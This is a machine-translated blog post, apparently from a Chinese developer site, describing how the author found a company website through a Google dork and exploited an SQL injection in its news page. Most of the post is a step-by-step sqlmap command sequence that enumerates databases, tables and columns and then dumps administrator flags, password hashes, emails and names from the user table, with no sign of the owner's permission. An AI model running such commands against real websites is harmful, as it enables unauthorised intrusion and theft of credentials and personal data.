当前位置:网站首页>Record the SQL injection vulnerability of XX company
Record the SQL injection vulnerability of XX company
2022-07-29 05:42:00 【adeylinux】
In the morning , When I get up , My friend , Ask me to participate in public welfare SRC. Then I was dragged to explore public welfare SRC. I opened it. Google Search for :inurl: Science and technology company . Then I opened a website . I previewed the website and found ?id Because of occupational disease . I am here ?id After that, a Single quotation marks ok ah . The page changes . I guess so xss perhaps SQL Inject holes .

Start penetration testing .
take out sqlmap Just a shuttle .
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class="
The result is really flawed . Then continue to test ,
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" --dbs
Here are two libraries :bdm818993245_db,information_schema
Then a shuttle .
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db --tables
bdm818993245_db Under the database 9 A watch :
| user || gplat_book || gplat_news || gplat_newsclass || gplat_newsclass2 || href || job || job_add || lawyer_wenda |
Next query user The following administrator and password .
python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user --columns
Space allowed user The following are 13 Columns :
+-----------+---------------+| Column | Type |+-----------+---------------+| adder | varchar(8) || admin | int(2) || email | varchar(60) || grade | varchar(12) || id | int(6) || image | varchar(70) || name | varchar(60) || pass | varchar(60) || phone | varchar(14) || qianming | varchar(100) || times | datetime || up_time | datetime || xingb | varchar(2) |+-----------+---------------+
Next query user below admni and pass The data of :
python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C admin,pass --dump
Next, collect the data of the database :
python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C email --dump 
Then collect data :
python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C 
Query the user name of the administrator :
python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C name --dump
The collection is almost done . End the penetration test . I will study the rest of the databases, tables and columns slowly .
summary :
SQl Injection try to use hand injection . Because tools run websites . It's easy to jump .

My public number . Please take care of me .
边栏推荐
- ClickHouse学习(九)clickhouse整合mysql
- ClickHouse学习(五)集群操作
- Common characteristic engineering operations
- [C language series] - storage of deep anatomical data in memory (I) opening of summer vacation
- DAY15:文件包含漏洞靶场手册(自用 file-include 靶场)
- [JS question solution] questions 1-10 in JS of niuke.com
- [C language series] - detailed explanation of file operation (Part 1)
- Qt布局管理--部件拉伸(Stretch)原理及大小策略(sizePolicy)
- Detailed explanation of typical application code of C language array - master enters by mistake (step-by-step code explanation)
- HCIA-R&S自用笔记(27)综合实验
猜你喜欢

Cmu15-213 shell lab experiment record

【JS题解】牛客网JS篇1-10题
![[C language series] - storage of deep anatomical data in memory (I) opening of summer vacation](/img/a8/367ff90ad1b65c404de446d198365b.png)
[C language series] - storage of deep anatomical data in memory (I) opening of summer vacation

HCIA-R&S自用笔记(26)PPP

OpenAtom OpenHarmony分论坛圆满举办,生态与产业发展迈向新征程

HCIA-R&S自用笔记(24)ACL

解决表单校验提示信息不消失问题以及赋值不生效问题

ClickHouse学习(九)clickhouse整合mysql

ClickHouse学习(五)集群操作

全局components组件注册
随机推荐
ClickHouse学习(五)集群操作
弹性盒子相关知识
利用Poi-tl在word模板表格单元格内一次插入多张图片和多行单元格相同数据自动合并的功能组件
【无标题】
Display effect of uniapp page title
Day 5
个人学习笔记
C language file operation
TXT 纯文本操作
QPalette学习笔记
Clickhouse learning (XI) clickhouseapi operation
href与src的区别
Thrift安装手册
How does the MD editor of CSDN input superscripts and subscripts? The input method of formula and non formula is different
Hcia-r & s self use notes (26) PPP
Detailed explanation of typical application code of C language array - master enters by mistake (step-by-step code explanation)
uniapp组件之选择选项(如套餐选择)
ClickHouse学习(六)语法优化
365 day challenge leetcode 1000 questions - day 035 one question per day + two point search 13
Similarities and differences between REM and PX and EM